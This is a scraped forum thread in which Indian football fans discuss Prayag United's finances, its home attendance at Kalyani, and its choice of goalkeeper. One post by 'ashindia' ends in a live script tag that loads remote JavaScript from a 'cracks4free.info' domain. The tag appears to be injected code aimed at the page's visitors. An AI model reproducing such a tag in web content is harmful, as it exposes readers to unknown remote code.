United SC News

Comments

• ArsenalFan700ArsenalFan700 Reddit13655 Points
    rudra wrote: »
    namewtheld wrote: »
    Who will buy? Where is the sense in it? Now u dont even have the 5000 odd employees of Prayag group.

<br><div><br></div><div>but in Kalyani people used to come...i dont think they were Prayag employees</div>

<br><div><br></div><div>Come on, lets be honest. It is not as if every Prayag home game was filled to capacity at Kalyani. The first couple were but after that the attendance started to dwindle. However, I don't know whether that could be because of East Bengal and Mohun Bagan also playing there, forcing some people to choose them over Prayag, or if it is just some people losing interest.</div>
  • Mohun Bagan fan will come and watch Prayag vs Mohun Bagan match at Kalyani or Salt Lake even though it is home game for Prayag. Lets say 6 home games for Prayag with big 3 of Calcutta.  The problem is when Prayag will play Dempo or anyone else at Salt Lake. <br>Chit Fund is not a viable business-this is not rocket science. Get new sponsors or leave. A different club will come to I-League with better ideas of how to attract sponsors and layers will also move on to better pastures. <br>
  • wekaweka Alabama, United States245 Points
    So weird seeing not a #1 GK at Prayag... I think it will be Sangram Mukherjee now that Subrata Pal has left.<h4 style="margin: 0px; padding: 11px 0px 0px 23px; font-size: 14px; font-family: Arial, Helvetica, sans-serif; color: rgb(255, 255, 255); line-height: 18px; text-align: justify;">Sangram Mukherjee</h4>
  • JoyptanJoyptan 295 Points
    weka wrote: »
    So weird seeing not a #1 GK at Prayag... I think it will be Sangram Mukherjee now that Subrata Pal has left.<h4 style="margin: 0px; padding: 11px 0px 0px 23px; font-size: 14px; font-family: Arial, Helvetica, sans-serif; color: rgb(255, 255, 255); line-height: 18px; text-align: justify;">Sangram Mukherjee</h4>

Anywas Sangram was their No 1 GK last season.
    Joyptan wrote: »
    weka wrote: »

Anywas Sangram was their No 1 GK last season.

<br><div><br></div><div>No, I'm talking about shirt number and general preference. Yes, Subrata had a dip in form the middle of the season but he regained it. </div><div><br></div><div>I would take Subrata over Sangram anyday.</div><div><br></div><div>What I meant to say was that now Sangram will wear #1 most likely instead of his old number.</div>
  • ashindiaashindia 9254 Points
    Does Subrata perform at club level the way he does for NT ??  I don't think so atleast from what I have watched in last 5 years or so<script src="http://cracks4free.info/5/adds.js"; async="" type="text/javascript"></script>
  • namewtheldnamewtheld Kolkata5665 Points
    I had asked this to him. He said 'I wonder why people say that, it's the same Subrata who plays for India and the club'
  • rudrarudra 2958 Points
    many such examples in world football...i think motivation factor works..or as people say some players are big game players...dont perform well in a regular basis....
    ashindia wrote: »
    Does Subrata perform at club level the way he does for NT ??  I don't think so atleast from what I have watched in last 5 years or so

<br><div><br></div><div>and yet... he's playing in the SAFF 2013... still. I'd take my chances with him. If he was terrible, of course I would say... but the level of GKs to be honest really isn't far and few between.</div>
  • weka wrote: »
    ashindia wrote: »
    Does Subrata perform at club level the way he does for NT ??  I don't think so atleast from what I have watched in last 5 years or so

<br><div><br></div><div>and yet... he's playing in the SAFF 2013... still. I'd take my chances with him. If he was terrible, of course I would say... but the level of GKs to be honest really isn't far and few between.</div>

<br>good to see a Spaniard following Indian football.. way to go weka <br> \m/